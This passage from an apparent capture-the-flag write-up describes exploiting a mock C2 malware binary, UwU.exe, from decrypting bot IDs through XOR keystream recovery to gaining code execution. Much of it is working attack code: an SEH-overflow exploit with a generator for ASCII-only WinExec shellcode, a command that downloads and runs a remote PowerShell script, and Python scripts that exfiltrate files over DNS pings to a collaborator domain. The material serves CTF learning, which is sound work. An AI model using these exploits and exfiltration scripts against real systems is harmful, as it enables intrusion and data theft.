- 715cf1a6-51de-4a55-be11-c0ffeec0ffee

However, these UwUIDs looked different from the UwUID returned from the registration HTTP request, such as oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma. This base64 string decoded to 36 bytes – the same number of bytes as the Bot Master UwUIDs in plaintext.

Perhaps the base64 string was simply an encoded version of a plaintext UwUID matching the pattern <4 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<6 HEX BYTES>. How could I decrypt them though?

I began fuzzing the POST /register.php request with different parameters. I noticed after a while that if I kept the parameters the same but kept repeating the request, I would eventually get the same encrypted UwUID again. Furthermore, after fuzzing too many times, I somehow crashed the encrypted UwUID generator (the organisers had to reset it) and began receiving only MDAwMDA=, which base64-decoded to 00000.

After many failed attempts, I began to wonder if I missed some crucial information. Since I downloaded the binary from http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/UwU.exe, I began fuzzing http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/<FUZZ>. As it turned out, http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/ was a simple directory listing that included README.txt.

Directory Listing

I opened the README and found out what I had been missing.

Congratulations, PALINDROME Member! You are now a proud UwUser of our latest malware, UwU.exe!

Before running the malware on your victim, it is important that the victim is a soft target. Ie, the win10 exploit mitigations should be disabled first (see https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#table-2configurable-windows-10-mitigations-designed-to-help-protect-against-memory-exploits). Win 8.1 and below are all fair game!

Upon running the malware, you will see several options. Namely:

  1. Register Bird

  2. Send Message

  3. Receive Messages

  4. Display Killswitch

  5. Exit

You should first register the malware (the Bird) with the C2 Server (the Birdwatcher), which is a server such as this one.

After that, you can send and receive messages, to communicate with the other registered Birds! Simply send the message to their UwUIDs (which will be assigned to you upon registering).

Each C2 Server will have several Big Birds as bot masters, which are essentially an identical copy of the malware you've received, but with a special killswitch only available for the Big Birds.

Also, you do not need to worry if the bot masters are taken offline. They will restart and reconnect to the C2 Server automatically!

This clarified things for me. I could contact the bot masters by sending them a message, so perhaps I could send some kind of payload to gain control of them. I set up my own fake C2 server in Python to test this theory.

from http.server import HTTPServer, BaseHTTPRequestHandler
from struct import pack

## from http.server import SimpleHTTPRequestHandler
import datetime

port = 8081

payload = b'A' * 2000

class myHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

        # Send the html message
        if self.path == '/register.php':
            # self.wfile.write(b'A' * 100000)
            self.wfile.write(
                b'40K8avCKsxKhO6OJ4Am4bq3bqEW6PvfG5hfpPKLeskDqZPHc')
        elif self.path == '/receive.php':
            self.wfile.write(payload)
        return


class StoppableHTTPServer(HTTPServer):
    def run(self):
        try:
            self.serve_forever()
        except KeyboardInterrupt:
            pass
        finally:
            # Clean-up server (close socket, etc.)
            self.server_close()


if __name__ == '__main__':
    server = HTTPServer(('127.0.0.1', 8081), myHandler)
    server.serve_forever()

I started the server and began receiving messages from my local UwU.exe. However, nothing happened. WireShark told me that the messages were received by UwU.exe, but for some reason it did not parse them. By debugging the program and reviewing the β€œReceive Messages” function in IDA, I discovered that it performed the following check after receiving the message:

    if ( (_DWORD)v82 != 3
      || ((v46 = v6->m128i_i8[0] < 0x55u, v6->m128i_i8[0] != 85)    // Check if first character is U
       || (second_char = v6->m128i_i8[1], v46 = (unsigned __int8)second_char < 0x77u, second_char != 119)   // Check if second character is w
       || (third_char = v6->m128i_i8[2], v46 = (unsigned __int8)third_char < 0x55u, third_char != 85) ? (v49 = v46 ? -1 : 1) : (v49 = 0),   // Check if third character is U
          is_valid_message = 1,
          v49) )
    {
      is_valid_message = 0;
    }
    if ( HIDWORD(v82) >= 0x10 )
    {
      v50 = HIDWORD(v82) + 1;
      if ( (unsigned int)(HIDWORD(v82) + 1) >= 0x1000 )
      {
        v18 = *(_DWORD *)(v81.m128i_i32[0] - 4);
        v50 = HIDWORD(v82) + 36;
        if ( v81.m128i_i32[0] - v18 - 4 > 0x1F )
          goto LABEL_141;
      }
      v66 = (__m128i *)v50;
      sub_5575B048(v18);
    }
    if ( is_valid_message )
    {
      <COPY RESPONSE DATA TO BUFFER>

This meant that the message had to match the format UwU<MESSAGE>. I corrected my server code and tried again. This time, I got a crash:

(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify timestamp for C:\Users\Eugene\Desktop\tisc\10\UwU_unpacked.exe
eax=41414141 ebx=004854a0 ecx=41414141 edx=41414142 esi=0019fcb4 edi=000001ff
eip=55752d5a esp=0019fc80 ebp=0019fcac iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
UwU_unpacked+0x2d5a:
55752d5a 8b49fc          mov     ecx,dword ptr [ecx-4] ds:002b:4141413d=????????
0:000> !exchain
0019fca0: 41414141
Invalid exception stack at 41414141
0:000> g
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=773985f0 esi=00000000 edi=00000000
eip=41414141 esp=0019f648 ebp=0019f668 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

I had triggered an SEH overflow, one of the easiest overflows to exploit. To add to my excitement, I determined that UwU.exe did not include any memory protections like DEP or ASLR thanks to the MPRESS packer. I easily generated a local proof-of-concept to execute Meterpreter shellcode via the overflow in the message. First, I determined that the offset to the overwritten SEH address was 36. Next, I used a simple POP POP RET payload with a JMP 0x08 instruction to get to my shellcode, just like in the basic tutorials. However, it was never going to be that easy. Even though the exploit worked locally, when I sent this to the bot master UwUIDs using the POST /send.php endpoint, nothing happened.

After several more angst-filled hours and confirming with the organisers that the network was working properly, I decided that this was a dead end. The C2 endpoint seemed to be filtering my payloads but I could not find out how it was doing so unless I sent messages to my own instances using the real C2. That required an unencrypted UwUID.

I recalled that the base64-decoded encrypted UwUID had the same number of bytes as the unencrypted plaintext bot master UwUIDs – 36. This suggested that the C2 used a stream cipher because stream ciphers generate the ciphertext by XORing each byte of the plaintext against a keystream, creating a ciphertext of the same length as the plaintext. If the C2 used a block cipher like AES, the plaintext would be padded to the block size length before being encrypted, causing the length of the ciphertext to be greater than the length of the plaintext.

I began researching various ways to break stream ciphers from a black box perspective. Once again, Stack Overflow came to my rescue. One of the answers described a known-plaintext attack against RC4. If the encryption service used the same key each time it encrypted something, the keystream would be the same for all inputs. Since each ciphertext was simply the plaintext XOR keystream, I could retrieve the XOR of two plaintexts by XORing their ciphertexts.

KS = RC4(K)
C1 = KS XOR M1
C2 = KS XOR M2
C1 XOR C2 = (KS XOR M1) XOR (KS XOR M2) = M1 XOR M2

I tried this out by registering twice with the same parameters to get two different ciphertexts. For example, with a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk, I got oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma and iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd. Next, I base64-decoded them and XORed them together. This returned the plaintext (.D6<.(.D6<.(.D6<.(.D6<.(.D6<.(.D6<. which was a repeating series of 6 bytes:

28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07

What did this mean? Since the randomly-generated parameters made up 6 bytes each, I decided to try XORing this output again with each of the parameters. Voila: the mysterious 6 bytes were simply pFvulv (parameter c) XORed with XH2CPq (parameter e). This meant that the C2 cipher randomly selected one of the parameters at registration and repeated it 6 times to create the plaintext.

However, while this explained why the encrypted UwUIDs repeated over time, this looked nothing like a plaintext UwUID. I also retrieved the keystream by XORing the plaintexts with their respective ciphertexts but did not get anything interesting.

Thinking further, I recalled an interesting observation from when I crashed the C2 encrypting function. While I was waiting for the organisers to fix the problem, I tried registering from a remote DigitalOcean Droplet instance and successfully retrieved valid encrypted UwUIDs even though I was unable to do so from my home network. This suggested that the encryption relied on the IP address. I logged into the remote instance and tried generating encrypted UwUIDs with the exact same parameters I had been using. It returned encrypted UwUIDs that were completely different from the ones I had generated from my home network, confirming the IP address hunch. I repeated the same process to retrieve the keystream and compared it to the keystream for my home network.

Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec

I noticed that some bytes matched at the same positions in both keystreams. Most of these were in the same positions as the dash characters in the unencrypted master UwUIDs.

Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
MasterUwUID: 7  1  5  c  f  1  a  6  -  5  1  d  e  -  4  a  5  5  -  b  e  1  1  -  c  0  f  f  e  e  c  0  f  f  e  e

This strongly signalled that a double-layer known-plaintext attack was at work. The keystream specific to each IP address used to encrypt the random 6-character parameter values was itself a ciphertext generated by XORing the plaintext UwUID belonging to the IP address with a master keystream. Since all plaintext UwUIDs had dash characters in the same positions, their IP address-specific keystreams would also have the same XOR result in those positions.

MASTER_KS = RC4(MASTER_K)
KS1 = MASTER_KS XOR UWUID1
KS2 = MASTER_KS XOR UWUID2
C1 = KS1 XOR RANDOMLY_SELECTED_PARAMETER_VALUE1
C2 = KS2 XOR RANDOMLY_SELECTED_PARAMETER_VALUE2

This explained why when I sent the same parameter values from different IP addresses, their encrypted UwUIDs never matched. But how could I retrieve the master keystream? Other than the dashes, I knew that the plaintext UwUIDs were hexadecimal number characters, i.e. 0-9a-f. With enough individual keystream samples, I could brute force all possible master keystream bytes and select the right one based on whether the candidate byte at position x XORed with all of the keystreams' bytes at position x always returned a byte in the range ASCII 0-9a-f.

Using my favourite VPN ExpressVPNNordVPN, I set to work. I generated and retrieved 13 different keystreams from 13 different IP addresses, then used the CyberChef XOR brute force filter to manually check which byte matched. Byte by byte, the keystream emerged. Fortunately, I realised that the master keystream was actually a series of 6 repeating bytes, e7 71 c4 0a a5 89. Next, I XORed the individual keystreams against the master keystream. To my delight, this resulted in legitimate plaintext UwUIds.

With the plaintext UwUID for my IP address, I sent a message using the POST /send.php endpoint, then checked the POST /receive.php endpoint with the encrypted UwUID. The message came through! Now, I could finally figure out why my payloads weren't working. Immediately, I realised that any payload above a certain length resulted in an empty message. I gradually narrowed down the maximum length to 328. Additionally, the first 32 bytes were rewritten to UwUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU. Finally, there were a few bad characters like \x25\x26\x2b. Fortunately, this seemed pretty manageable.

Or so I thought. Not long after, I received a notification from the organisers that they had fixed a bug in the servers. When I retried the receive endpoints, I realised that the number of bad bytes had increased enormously – any byte from \x80 onwards was nulled out. In other words, I had to write ASCII-only shellcode.

While I was fairly comfortable with writing Windows shellcode thanks to the Offensive Security Exploit Developer (OSED) course, I had never faced such severe restrictions before. There were a few writeups on ASCII-only Linux shellcode online but I could not find one for Windows that matched my length requirements.

After the initial panic, I settled on my plan of action. First, I noticed that UwU.exe imported GetProcAddress and GetModuleHandleW, so I could dereference those functions from fixed addresses in the Import Address Table of the executable (remember there were no memory protections like ASLR) and use them to retrieve the address of WinExec from Kernel32. Afterwards, I could call WinExec with my desired commands. To build my shellcode, I heavily modified a Windows shellcode generation script I had previously used for OSED. After doing some research, I also found a useful Linux ASCII shellcode writeup that highlighted several useful gadgets:

## h4W1P - push   0x50315734                # + pop eax -> set eax
## 5xxxx - xor    eax, xxxx                 # use xor to generate string
## j1X41 - eax <- 0                         # clear eax
## 1B2   - xor    DWORD PTR [edx+0x32], eax # assign value to shellcode
## 2J2   - xor    cl, BYTE PTR [edx+0x32]   # nop
## 41    - xor al, 0x31                     # nop
## X     - pop    eax
## P     - push   eax

In particular, I could use xor DWORD PTR [edx+0x32], eax to decode non-ASCII instructions when I could not find a suitable ASCII replacement.

Finally, I found the smallest null-free WinExec shellcode to use as a reference.

With these tools in hand, I began to craft my shellcode. Starting from the top, I replaced my original POP POP RET pointer 0x55758b55 with 0x55756e78 which pointed to pop ebx ; pop ebp ; retn 0x0004 to meet the ASCII character requirements. I also replaced the non-ASCII JMP 0x8 (eb 06) with the ASCII-only JNS 0x8 (79 06). Afterwards, I used the xor DWORD PTR [edx+0x32], eax decoder gadget for my shellcode. My first draft relied heavily on this gadget and did not replace many non-ASCII instructions. I also originally tried to use GetModuleHandleW and GetProcAddress to resolve the address of WinExec. However, for some reason or another, GetProcAddress could not work at all even though GetModuleHandleW worked perfectly. I suspected that this was some strange wide string versus regular string bug but could not fix it even after debugging with GetLastError. It could also have been due to Import Address Filter protections but I could not confirm if that flag was turned on.

Giving up on GetProcAddress, I decided to pass the base address of Kernel32 I had retrieved with GetModuleHandleW to the function search loop used in my reference shellcode. With lots of effort, I eventually got my patchwork payload to work and execute a simple calc. Next, I modified it to powershell iex $(irm http://<IP ADDRESS>) to download and execute a remote PowerShell script. Although this worked on my local instances, it failed when I tried it on the master UwUIDs – an incresingly common pattern. As I was working without any visibility of the bot masters, I faced huge difficulties trying to figure out why it was failing. After hours of frustration, I decided to focus on cleaning up my shellcode – perhaps the messy shellcode caused problems.

Firstly, my over-reliance on the decoding gadget created lots of unnecessary instructions, reducing the number of bytes available for my WinExec command. I bit the bullet and tried to convert some of the encoded bytes to true ASCII shellcode. I discovered a few useful gadgets to replace these instructions with their ASCII equivalents.

Non-ASCII Bytes Non-ASCII Instructions ASCII Bytes ASCII Instructions
01 fe add esi,edi; 57 03 34 24 push edi; add esi, DWORD PTR [esp];
8b 74 1f 1c mov esi, DWORD PTR [edi+ebx*1+0x1c]; 5e 33 74 1f 1c pop esi; xor esi, DWORD PTR [edi+ebx*1+0x1c];
31 db xor ebx, ebx; 53 33 1c 24 push ebx; xor ebx, DWORD PTR [esp];

The only non-ASCII instructions I could not replace were the CALL and negative short JMP instructions, so I continued to rely on the decoder gadget for those. Thanks to these optimisations, I cut down on two-thirds of the decoder gadgets and freed up 40 bytes – a fortune in shellcode. I now had 76 bytes for my command argument. I also patched a bug where Windows 7 needed a valid uCmdShow argument for WinExec – Windows 8 and 10 gracefully dealt with any invalid uCmdShow arguments. My new and improved shellcode worked much more reliably.

##!/usr/bin/python3
import argparse
import keystone as ks
from struct import pack

def to_hex(s):
    retval = list()
    for char in s:
        retval.append(hex(ord(char)).replace("0x", ""))
    return "".join(retval)


def push_string(input_string):
    rev_hex_payload = str(to_hex(input_string))
    rev_hex_payload_len = len(rev_hex_payload)

    instructions = []
    first_instructions = []
    null_terminated = False
    for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the left ofer instructions
        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
            
    instructions = first_instructions + instructions
    asm_instructions = "".join(instructions)
    return asm_instructions


def ascii_shellcode(breakpoint=0):
    command = "calc"
    if len(command) > 76:
        exit(1)
    command += " " * (76 - len(command)) # amount of padding available
    asm = [
        # at start, eax, esi, edi are nulled
        "   start:                               ",
        f"{['', 'int3;'][breakpoint]}            ",
        "       pop     edx ;",
        "       pop     edx ;",                                     # Pointer to shellcode in edx
        "       xor     al, 0x7f;",                                 # inc eax to 0x80 which xors out the ones that are out of reach
        "       inc     eax;",
        "       xor     dword ptr [edx+0x6e], eax;",                # correct ff d7 call   edi
        "       xor     dword ptr [edx+0x6f], eax;",                # correct ff d7 call   edi
        "       push    0x7f;",                                     # dont need ebx, use eax
        "       pop     ebx;",
        "       xor     dword ptr [edx+ebx+0x24], eax;",            # correct ad lods   eax,dword ptr ds:[esi]
        "       xor     dword ptr [edx+ebx+0x29], eax;",            # correct 75 ed jne    0x68
        "       push    0x7f;",
        "       add     ebx, dword ptr [esp];",
        "       xor     dword ptr [edx+ebx+0x27], eax;",            # correct ff d7 call   edi    msiexec
        "       xor     dword ptr [edx+ebx+0x28], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",            # correct ff d7 call   edi
        "       push    0x53736046;",                               # 60 should xor with 80 to get e0
        "       pop     ebx;",                                      # IAT address pointer to GetModuleHandle in ebx
        "       push    0x01014001;",
        "       add     ebx, dword ptr [esp];",
        "       add     ebx, dword ptr [esp];",
        "       push    0x01010101;",                               # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
        "       pop     eax;",                                      # use eax to xor for null bytes in wide string
        "       xor     edi, dword ptr [ebx];",                     # dereference IAT, get GetModuleHandle in edi       
        "       push    esi;",                                      # nulls for end of wide string
        "       push    0x01330132;",                               # push widestring "kernel32" onto stack
        "       xor     dword ptr [esp], eax;",
        "       push    0x016d0164;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x016f0173;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x0164016a;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    esp;",
        "       call    edi;",                                      # call GetModuleHandle(&"kernel32")
        "       push    eax;",                                      # Kernel32 base address in eax
        "       pop     edi;",
        "       push    esi;",                                      # null bytes
        "       pop     ebx;",                                  
        "       xor     ebx, dword ptr [edi + 0x3C];",              # ebx = [kernel32 + 0x3C] = offset(PE header)
        "       push    ebx;",                                      # null out bytes on top of stack
        "       xor     ebx, dword ptr [esp];",
        "       pop     eax;",
        "       xor     ebx, dword ptr [edi + eax + 0x78];",        # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
        "       xor     esi, dword ptr [edi + ebx + 0x20];",        # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                     # esi = kernel32 + offset(names table) = &(names table)
        "       xor     dword ptr [esp], edi;",                     # null out bytes on top of stack
        "       pop     edx;",
        "       xor     edx, [edi + ebx + 0x24];",                  # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
        push_string("WinE"),
        "       pop     ecx;",                                      # ecx = 'WinE'
        "   find_winexec_x86:"
        "       push    ebp;",
        "       xor     dword ptr [esp], ebp;",                     # null out bytes on top of stack
        "       AND     ebp, dword ptr [esp];",                     # nulls out ebp for xor operation
        "       xor     BP, WORD ptr [edi + edx];",                 # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
        "       INC     edx;",
        "       INC     edx;",                                      # edx = offset += 2
        "       lodsd;",                                            # eax = &(names table[function number]) = offset(function name)
        "       CMP     [edi + eax], ecx; "                         # *(DWORD*)(function name) == "WinE" ?
        "       JNE     find_winexec_x86;",
        "       pop     esi;",
        "       xor     esi, dword ptr [edi + ebx + 0x1C];",        # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                     # esi = kernel32 + offset(address table) = &(address table)
        "       push    ebp;",
        "       add     ebp, dword ptr [esp];",
        "       add     edi, [esi + ebp * 2];",                     # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
        "       push    0x31;",                                     # null out eax
        "       pop     eax;",
        "       xor     al, 0x31;",
        "       push    eax;",
        push_string(command),                                       # set up args for WinExec
        "       push    esp;",
        "       pop     ebx;",
        "       inc     eax;",
        "       push    eax;",
        "       push    ebx;",
        "       inc     ecx;",                                      # NOP
        "       inc     ecx;",                                      # NOP
        "       CALL    edi;",                                      # WinExec(&("calc"), 1);
        # If you like graceful exits
        # "       push   0x53736016;",                            
        # "       pop    ebx;",                                       
        # "       push 0x01014001;",
        # "       add ebx, dword ptr [esp];",
        # "       add ebx, dword ptr [esp];",                         # ebx = IAT address pointer to TerminateProcess
        # "       push eax;",                                     
        # "       xor     eax, dword ptr [esp];",                     # uExitCode = 0
        # "       push    eax;",
        # "       and     edi, dword ptr [esp];",                     # null out edi
        # "       xor    edi, dword ptr [ebx];",                      # edi = *TerminateProcess
        # "       dec eax;",                                          # hProcess = 0xFFFFFFFF
        # "       push eax;",
        # "       inc ecx;",                                          # NOP
        # "       call edi;",                                         # TerminateProcess(0xFFFFFFFF, 0)
    ]
    return "\n".join(asm)


def main(args):
    shellcode = ascii_shellcode( args.debug_break)

    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)

    url_encoded_payload = ""
    payload = b'UwU'                                        # magic bytes
    payload += b'A' * 29                                    # offset
    payload += pack("<L", (0x41410679))                     # jns    0x8
    payload += pack("<L", (0x55756e78))                     # pop ebx ; pop ebp ; retn 0x0004
    payload += bytes(encoding)                              # shellcode
    payload += b"A" * (328 - len(payload))                  # filler
    for enc in payload:
        url_encoded_payload += "%{0:02x}".format(enc)

    print("url_encoded_payload = " + url_encoded_payload
        .replace("%ff%d7", "%7f%57")
        .replace("%8b","%0b")
        .replace("%fe","%7e")
        .replace("%b7","%37")
        .replace("%ad","%2d")
        .replace("%ee","%6e")
        .replace("%ae","%2e")
        .replace("%ed", "%6d"))


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Creates shellcodes compatible with the OSED lab VM"
    )

    parser.add_argument(
        "-d",
        "--debug-break",
        help="add a software breakpoint as the first shellcode instruction",
        action="store_true",
    )

    args = parser.parse_args()

    main(args)

This time, I had enough bytes to run a ping <BURP COLLABORATOR DOMAIN> command on the bot masters. Thankfully, I got a pingback!

DNS Ping

I excitedly began trying other payloads like the remote PowerShell script execution, msiexec, and more. However, despite my many attempts, none of these reached my server other than the DNS requests. With a growing sense of dread, I came to terms with what this meant: the challenge expected me to use DNS exfiltration. I confirmed this by sending a series of commands like powershell Add-Content test spaceraccoon, powershell Add-Content test .<BUR PCOLLABORATOR URL>, and powershell "ping $(type test)", which resulted in a DNS pingback at spaceraccoon.<BURP COLLABORATOR DOMAIN>.

DNS Write File

While there was good news – I could write to arbitrary files – this further confirmed that DNS exfiltration was the way to go. I began writing a script to automate this exfiltration. To retrieve the outputs of commands, I wrote the output of the command to a working file, then appended my burpcollaborator domain. Next, I replaced any non-DNS-compatible characters using PowerShell. Finally, I pinged the concatenated domain in the file and hopefully retrieved the output.

For example, to retrieve the current working directory, I ran:

def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)

def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

I got a pingback at C--Users-Administrator-AppData-LocalLow.<BURP COLLABORATOR DOMAIN>, which I converted back to C:\Users\Administrator\AppData\LocalLow.

Since the master bots included the special UwU.exe instances with the flag, I aimed to locate and exfiltrate it. I began enumerating the files in the current working directory with:

def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

This leaked the file names Microsoft, Temp, and 1_run_uwu1.bat. This seemed interesting. To exfiltrate files, I first converted them to base64 using certutil and a special undocumented option. I then replaced the incompatible base64 characters like + and / with - and . respectively. Unfortunately, I could not use + directly since \x26 was a bad character, so I replaced it with the functionally-equivalent [char]43. I also removed any trailing = characters. Next, I exfiltrated the file in blocks of 50 base64 characters at a time. To ensure that I got the blocks in the correct order, I added the block number before and after the base64 characters as a primitive checksum.

def delete_file(filename):
    send_command('powershell del {}'.format(filename))
    
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()

def exfil_file(filename):
    base64_file = "e"
    block_size = 50

    # delete base64 file
    delete_file(base64_file)

    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))

    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))

    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))


    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size

        exfil_working_file()

After a long wait, I got the contents of 1_run_uwu1.bat.

@echo off
echo ^1>uwu_cmds.txt
echo %c2ip%>>uwu_cmds.txt
echo %c2port%>>uwu_cmds.txt
echo ^3>>uwu_cmds.txt

:loop
type uwu_cmds.txt | C:\Users\Administrator\AppData\LocalLow\cmd.exe /c final_uwu_with_flag.exe
taskkill /im werfault.exe /f
goto loop

Great! I could try exfiltrating final_uwu_with_flag.exe, but my get_file_length function told me that the base64 encoding of final_uwu_with_flag.exe was 989868 bytes long, which would have taken days to exfiltrate. Instead, the contents of 1_run_uwu1.bat gave me an idea – why not pipe inputs to final_uwu_with_flag.exe to execute the β€œDisplay Killswitch” option, write the output to a file, then exfiltrate that instead? I could save even more bytes by grepping the output for the TISC{ flag marker.

def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)        # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Encoding ascii -Pattern TISC|Out-File y\"")       # save more time
    exfil_file("y")

Without further ado, I started the exfiltration. As each minute ticked by, the base64 strings slowly emerged.

Exfil Flag

Halfway through, I placed the half-finished base64 string into a decoder, and there it was. I had finally reached the end of this insane odyssey. Thankfully, there was no bonus level, so I submitted my flag and got some sleep.

##!/usr/bin/python3
import requests
import keystone as ks
from struct import pack
from time import sleep
## import uuid

def to_hex(s):
    retval = list()
    for char in s:
        retval.append(hex(ord(char)).replace("0x", ""))
    return "".join(retval)


def push_string(input_string):
    rev_hex_payload = str(to_hex(input_string))
    rev_hex_payload_len = len(rev_hex_payload)

    instructions = []
    first_instructions = []
    null_terminated = False
    for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the left ofer instructions
        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
